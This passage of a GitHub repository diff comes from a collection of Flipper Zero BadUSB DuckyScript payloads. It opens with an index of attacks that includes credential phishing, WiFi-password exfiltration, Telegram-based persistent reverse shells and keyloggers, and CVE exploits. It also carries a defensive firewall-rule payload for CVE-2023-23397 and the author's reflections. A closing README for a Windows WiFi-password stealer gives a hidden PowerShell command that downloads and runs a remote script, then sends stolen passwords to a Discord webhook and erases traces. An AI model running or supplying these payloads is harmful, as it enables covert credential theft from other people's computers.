|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Email And Password By Phising](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateEmailAndPasswordByPhising_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Sudo Password By Phishing](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateSudoPasswordByPhising_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate WiFi Passwords](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltrateWiFiPasswords_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Exfiltration|[Exfiltrate Photos Through Shell](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Exfiltration/ExfiltratePhotosThroughShell)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Save Your Thunderbird Settings](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Save_Your_Thunderbird_Settings)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Phising|[Standard Phishing Attack](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Phising/StandardPhishingAttack_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Phising|[Standard Phishing Payload Using kdialog](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Phising/StandardPhishingPayloadUsingKdialog_Linux)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Install Official VSCode Extension](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Install_Official_VSCode_Extension)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Install Any Arbitrary VSCode Extension](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Install_Any_Arbitrary_VSCode_Extension)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Set An Arbitrary And Persistent Tor Circuit](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Set An Arbitrary And Persistent Tor Circuit](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Set Tor Bridge](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Set_Tor_Bridge)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Exploiting An Executable File](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/ExploitingAnExecutableFile)|🟢|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Change MAC Address](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/ChangeMacAddress_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Set Arbitrary VPN](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/SetArbitraryVPN_Linux)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Close All Applications](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/CloseAllApplications_Windows)|🟢|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Change Network Configuration](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/ChangeNetworkConfiguration_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Edit The Default Real App With An Arbitrary](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Edit_The_Default_Real_App_With_An_Arbitrary)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Uninstall Signal](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/UninstallSignal)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Set An Arbitrary DNS - IPv4 version](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Set_An_Arbitrary_DNS-IPv4_version)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Add An Excepiton To Avast Antivirus](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Add_An_Excepiton_To_Avast_Antivirus)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Make Windows performant (but ugly and boring)](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Make_Windows_performant_(but_ugly_and_boring))|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Change Windows User Name](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Change_Windows_User_Name)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Starting a PowerShell with administrator permissions in Windows](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Change the password of the Windows user](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Change_the_password_of_the_windows_user)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Stop A Single Process In Windows](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Stop_A_Single_Process_In_Windows)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Uninstall A Specific App On Windows Through Control Panel](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Persistent Reverse Shell - Telegram Based](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Persistent_Reverse_Shell-Telegram_Based)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Telegram Persistent Connection Linux](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Telegram_Persistent_Connection_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Persistent Keylogger - Telegram Based](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Persistent_Keylogger-Telegram_Based)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Change Git Remote Link](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/ChangeGitRemoteLink)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Change Git Remote Link](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/ChangeGitRemoteLink)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Send Messages In Discord Channel-Server](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Send_Messages_In_Discord_Channel-Server)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Install And Run Any Arbitrary Executable - No Internet And Root Needed](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Defend yourself against AtlasVPN bugdoor](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Defend_yourself_against_AtlasVPN_bugdoor)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Shutdown After 1 Minute - By NexusWannaBe](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Shutdown_After_1_Minute-By_NexusWannaBe)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Immediate Shutdown - By NexusWannaBe](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Immediate_Shutdown-By_NexusWannaBe)|🟢|
|![MacOS](https://img.shields.io/badge/macos-000000?style=for-the-badge&logo=macos&logoColor=white)|Execution|[IPLogger - Discord Webhook - by bst04](https://github.com/aleff-github/my-flipper-shits/tree/main/MacOS/Execution/IPLogger-Discord_Webhook-by_bst04)|🟡|
|![MacOS](https://img.shields.io/badge/macos-000000?style=for-the-badge&logo=macos&logoColor=white)|Execution|[Set Volume Max - MacOS - by bst04](https://github.com/aleff-github/my-flipper-shits/tree/main/MacOS/Execution/SetVolumeMax-MacOS)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[CheckBattery - by bst04](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/CheckBattery-by_bst04)|🟢|
|![iOS](https://img.shields.io/badge/iOS-000000?style=for-the-badge&logo=ios&logoColor=white)|Prank|[Text Someone Message With iPhone - by bst04](https://github.com/aleff-github/my-flipper-shits/tree/main/iOS/Execution/Text_Someone_Message_With_iPhone-by_bst04)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)**KDE**|Prank|[Change Desktop Wallpaper](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/ChangeDesktopWallpaper_LinuxKDE)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Send Signal Messages](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/SendSignalMessages_Windows)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Send Microsoft Teams Messages](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/SendMessagesInTeams)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Never Gonna Give You Up](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/NeverGonnaGiveYouUp_Windows)|🟢|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[Send Telegram Messages](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/SendTelegramMessages_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[Change The App That Will Be Runned](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/Change_The_App_That_Will_Be_Runned)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Alien Message From Computer](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/AlienMessageFromComputer)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Continuous Print In Terminal](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/ContinuousPrintInTerminal)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Change Wallpaper With Screenshot](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/ChangeWallpaperWithScreenshot)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Play A Song Through Spotify](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/PlayASongThroughSpotify)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Full-Screen Banner Joke](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Full-ScreenBannerJoke)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[The Mouse Moves By Itself](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/The_Mouse_Moves_By_Itself)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Try To Catch Me](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Try_To_Catch_Me)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Follow Someone On Instagram](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Follow_Someone_On_Instagram)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Pranh(ex)](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Pranh(ex))|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Send Email Through Thunderbird](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/SendEmailThroughThunderbird)|🟢|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[Send Email Through Thunderbird](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/SendEmailThroughThunderbird)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Change Github Profile Settings](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Change_Github_Profile_Settings)|🟡|
|![iOS](https://img.shields.io/badge/iOS-000000?style=for-the-badge&logo=ios&logoColor=white)|Prank|[Play A Song With An iPhone](https://github.com/aleff-github/my-flipper-shits/tree/main/iOS/Prank/Play_A_Song_With_An_iPhone)|🟡|
|![iOS](https://img.shields.io/badge/iOS-000000?style=for-the-badge&logo=ios&logoColor=white)|Prank|[Call Someone With An iPhone](https://github.com/aleff-github/my-flipper-shits/tree/main/iOS/Prank/Call_Someone_With_An_iPhone)|🟡|
|![iOS](https://img.shields.io/badge/iOS-000000?style=for-the-badge&logo=ios&logoColor=white)|Prank|[Edit A Reminder With An iPhone](https://github.com/aleff-github/my-flipper-shits/tree/main/iOS/Prank/Edit_A_Reminder_With_An_iPhone)|🟡|
|![iOS](https://img.shields.io/badge/iOS-000000?style=for-the-badge&logo=ios&logoColor=white)|Prank|[Delete A Reminder With An iPhone](https://github.com/aleff-github/my-flipper-shits/tree/main/iOS/Prank/Delete_A_Reminder_With_An_iPhone)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[Kali Linux - This_damn_shell_doesn_t_work... so_sad!](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/This_damn_shell_doesn_t_work___so_sad!-KALI)|🟢|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[Linux - This_damn_shell_doesn_t_work... so_sad!](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/This_damn_shell_doesn_t_work___so_sad!-LINUX)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Prank In The Middle - Thunderbird](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Prank_In_The_Middle_Thunderbird)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Spam Terminals - by bst04](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Spam_Terminals-by_bst04)|🟢|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Indicent Response|[Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Incident_Response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE)|🔴|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Indicent Response|[Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966)|🔴|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Indicent Response|[Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966)|🔴|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Incident Response|[Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Incident_Response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_Remote_Code_Execution_Vulnerability)|🟢|
|//|Prank|[Flipper Zero GIF](img/gif)|🟢|
## FAQs
<ul>
<li><strong>DEFINE</strong> doesn't work!
<ul>
<li>DEFINEs in FlipperZero probably doesn't work, if they give you an error just remove them by directly entering what you want in the appropriate place</li>
</ul>
</li>
<li><strong>REM</strong> errors
<ul>
<li>If you have an error on a REM line make sure it is not a blank line. In any case, REMs are comments and can be deleted so try deleting the line that gives you an error to see if it fixes the problem.</li>
</ul>
</li>
<li>In the Rick Roll video prank it's calling for a bit.ly and seems to go to a github 404 page
<ul>
<li><a href="https://github.com/aleff-github/my-flipper-shits/issues/3">Solution</a> - <strong>bit.ly</strong> link broken - 404 problems</li>
</ul>
</li>
<li>I dont understand how to put a .py link in a .txt can you help me please?
<ul>
<li><a href="https://github.com/aleff-github/my-flipper-shits/issues/6">Solution</a> - How to insert a link to an external resource and why?</li>
</ul>
</li>
<li>Why you should absolutely not use permanent links maintained by others.
<ul>
<li><a href="https://github.com/aleff-github/my-flipper-shits/pull/14">Read the discussion</a> born from a Pull Request</li>
</ul>
</li>
</ul>
## Where They Talk About This Repository
- [CVE Feed](https://cvefeed.io/vuln/detail/CVE-2023-20273)
- [CSDN(Chinese Software Developer Network)/Full Article (Special Thanks!)](https://blog.csdn.net/gitblog_00086/article/details/139082132)
- [CSDN in-List](https://blog.csdn.net/gitblog_00085/article/details/141084245)
- [Infosec Writeups](https://infosecwriteups.com/the-ultimate-guide-cheatsheet-to-flipper-zero-d4c42d79d32c)
- [SOS-Intelligence](https://sosintel.co.uk/flipper-zero-an-introduction-to-its-capabilities-and-potential-risks/)
- [Intelligence](https://sosintel.co.uk/category/opinion/)
- [Achirou](https://achirou.com/guia-de-flipper-zero-hacking-con-badusb/)
- [Awesome Open Source - The Top 23 Flipperzero Open Source Projects](https://awesomeopensource.com/projects/flipperzero)
- [Decryptology](https://dev.decryptology.net/GitHub/awesome-flipperzero#badusb)
- [Gitters/Hak5](https://giters.com/topics/hak5)
- [Christan Workshop](https://christanworkshop.com/flipperzero)
- [Twitter/HAHWUL](https://x.com/hahwul/status/1829076650681872619)
- [Popdocs](https://flipper.popdocs.net/applications/duckyscript)
## Some Boring Considerations
This is my pay after over 1 year and 3 months of work.
![](https://i.ibb.co/h2g16g3/1712950001561.jpg)
On January 4, 2023, after treating myself to the Flipper Zero for Christmas, I began publishing scripts in DuckyScript on the GitHub repository 'my-flipper-shits'.
I've always considered it normal and right to publish the source code I developed because I find it absurd to cover it with a copyright license, and for this reason, I decided to make it available under the copyleft GPLv3 license.
After a few months, I started to see that some people were staring the repository, then the first forks appeared, and finally, I decided to tidy it up a bit and make it more usable with a much nicer README.md.
Someone wrote to me on Discord, others sent me an email, but whenever they reported problems, I always tried to help them, not always succeeding, but always trying. So I added FAQs to the homepage.
After:
- 80 payloads uploaded for GNU/Linux, Windows, and iOS.
- Over 252,000 views.
- 771 Stars
- 55 Forks
- 19 watching
… this is the first completely spontaneous 'thank you' (without providing assistance) I've received in over 1 year of activity.
Activity open to anyone and making everything I did available under GPLv3, all without ever asking for a single euro. For free. My intention with these publications is to disseminate, within the limits of my knowledge, as much as I can to anyone without making any distinctions, so that knowledge can be freely and librement available to anyone.
And it is precisely for this reason that I consider this spontaneous thanks from a completely unknown person my pay.
Developing libre source code is important, and I hope this message is clear.
## Credits
<div align=center>
<h2> Aleff</h2>
<table>
<tr>
<td align="center" width="96">
<img src="https://raw.githubusercontent.com/aleff-github/aleff-github/main/img/github.png" width="48" height="48" onclick="window.open('https://github.com/aleff-github')"/>
<br>
<p>Github</p>
</td>
<td align="center" width="96">
<img src="https://raw.githubusercontent.com/aleff-github/aleff-github/main/img/linkedin.png" width="48" height="48" onclick="window.open('https://www.linkedin.com/in/alessandro-greco-aka-aleff/')"/>
<br>
<p>LinkedIn</p>
</td>
</tr>
</table>
<ul>
<li>
GitHub: https://github.com/aleff-github
</li>
<li>
Linkedin: https://www.linkedin.com/in/alessandro-greco-aka-aleff/
</li>
</ul>
</div>
Windows/Credentials/Defend_yourself_from_CVE-2023-23397/README.md
+115
View File
@@ -0,0 +1,115 @@
# Defend Yourself From CVE-2023-23397
This script allows you to set the Firewall rule that will allow you to defend against CVE-2023-23397.
**Category**: Credentials
*I decided to set Credentials as the category because of the type of CVE.*
## Index
- [Defend Yourself From CVE-2023-23397](#defend-yourself-from-cve-2023-23397)
- [Payload Description](#payload-description)
- [CVE-2023-23397 Description](#cve-2023-23397-description)
- [Summary](#summary)
- [Impacted Products](#impacted-products)
- [Technical Details](#technical-details)
- [Note](#note)
- [Dependencies](#dependencies)
- [Settings](#settings)
- [Administrative Privileges](#administrative-privileges)
- [Set the rule](#set-the-rule)
- [See the new rule](#see-the-new-rule)
- [Remove the rule](#remove-the-rule)
- [Credits](#credits)
## Payload Description
This script allows you to set the Firewall rule that will allow you to defend against CVE-2023-23397.
Open a PowerShell, set the Firewall rule trough NetSecurity module.
![](docs/2.png)
## CVE-2023-23397 Description
### Summary
Microsoft Threat Intelligence discovered limited, targeted abuse of a vulnerability in Microsoft Outlook for Windows that allows for new technology LAN manager (NTLM) credential theft to an untrusted network, such as the Internet. Microsoft has released CVE-2023-23397 to address the critical elevation of privilege (EoP) vulnerability affecting Microsoft Outlook for Windows. We strongly recommend all customers update Microsoft Outlook for Windows to remain secure.
### Impacted Products
All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
### Technical Details
CVE-2023-23397 is a critical EoP vulnerability in Microsoft Outlook that is triggered when an attacker sends a message with an extended MAPI property with a UNC path to an SMB (TCP 445) share on a threat actor-controlled server on an untrusted network. No user interaction is required.
The threat actor is using a connection to the remote SMB server sends the users NTLM negotiation message, which the attacker can then relay for authentication against other systems that support NTLM authentication.
**Source**: https://msrc.microsoft.com/blog/2023/03/microsoft-mitigates-outlook-elevation-of-privilege-vulnerability/
## Note
Tested on:
- Windows 11 Eng
## Dependencies
* ExecutionPolicy Bypass
## Settings
In this payload, I created a new firewall rule called "CVE-2023-23397". The direction is set to "Outbound," the action is "Block" (block traffic), the protocol is "TCP," and the remote port is 445 (SMB). Next, the rule is enabled using the Enable-NetFirewallRule cmdlet by specifying the name of the previously created rule.
Remember that you must run PowerShell with administrative privileges to create and manage firewall rules.
### Administrative Privileges
- I used the Payload [Starting a PowerShell with administrator permissions in Windows 10/11](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows) by Hak5 Payloads
```
DELAY 1000
GUI x
DELAY 500
STRING a
DELAY 500
LEFT_ARROW
DELAY 500
ENTER
```
### Set the rule
![](docs/1.png)
### See the new rule
![](docs/2.png)
### Remove the rule
![](docs/3.png)
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
Windows/Credentials/Defend_yourself_from_CVE-2023-23397/docs/1.png
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 24 KiB

Windows/Credentials/Defend_yourself_from_CVE-2023-23397/docs/2.png
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 73 KiB

Windows/Credentials/Defend_yourself_from_CVE-2023-23397/docs/3.png
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 26 KiB

Windows/Credentials/Defend_yourself_from_CVE-2023-23397/payload.txt
+56
View File
@@ -0,0 +1,56 @@
REM ########################################################
REM # |
REM # Title : Defend Yourself From CVE-2023-23397 |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Credentials |
REM # Target : Windows 10/11 |
REM # |
REM ########################################################
REM PlugAndPlay <3
REM Requirements:
REM - ExecutionPolicy Bypass
REM Impacted Products:
REM - All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
REM Mitigation:
REM - Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
DELAY 1000
GUI x
DELAY 500
STRING a
DELAY 500
LEFTARROW
DELAY 500
ENTER
REM Import NetSecurity module
STRING Import-Module NetSecurity
ENTER
REM Create a new firewall rule for blocking outgoing connections on port 445
STRING $rule = New-NetFirewallRule -DisplayName "CVE-2023-23397" `
ENTER
STRING -Direction Outbound `
ENTER
STRING -Action Block `
ENTER
STRING -Protocol TCP `
ENTER
STRING-RemotePort 445
ENTER
REM Enable firewall rule
STRING Enable-NetFirewallRule -Name $rule.Name
ENTER
DELAY 500
REM See your new rule
STRING Get-NetFirewallRule | Where-Object { $_.DisplayName -eq "CVE-2023-23397" }
ENTER
Windows/Credentials/WiFiPasswords_Windows/README.md
+69
View File
@@ -0,0 +1,69 @@
# WLAN Windows Password - BadUSB ✅
A script used to stole target WLAN Passwords.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: WLAN, Credentials
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to stole target WLAN Passwords.
Opens PowerShell hidden, grabs wlan passwords, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
Then it cleans up traces of what you have done after.
## Getting Started
### Dependencies
* An internet connection
* Windows 10,11
### Executing program
* Plug in your device
* Invoke 2 netsh commands
* Invoke-WebRequest will be entered in the Run Box to send the content
ENG 🇺🇸
```powershell
powershell -w h -ep bypass $discord='<your_webhook_here>';irm bit.ly/WindowsWiFiPasswordsENG | iex
```
ITA 🇮🇹
```powershell
powershell -w h -ep bypass $discord='<your_webhook_here>';irm bit.ly/WindowsWiFiPasswordsITA | iex
```
You must put your Discord webhook into the variable $discord='\<your-webhook-here>'
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
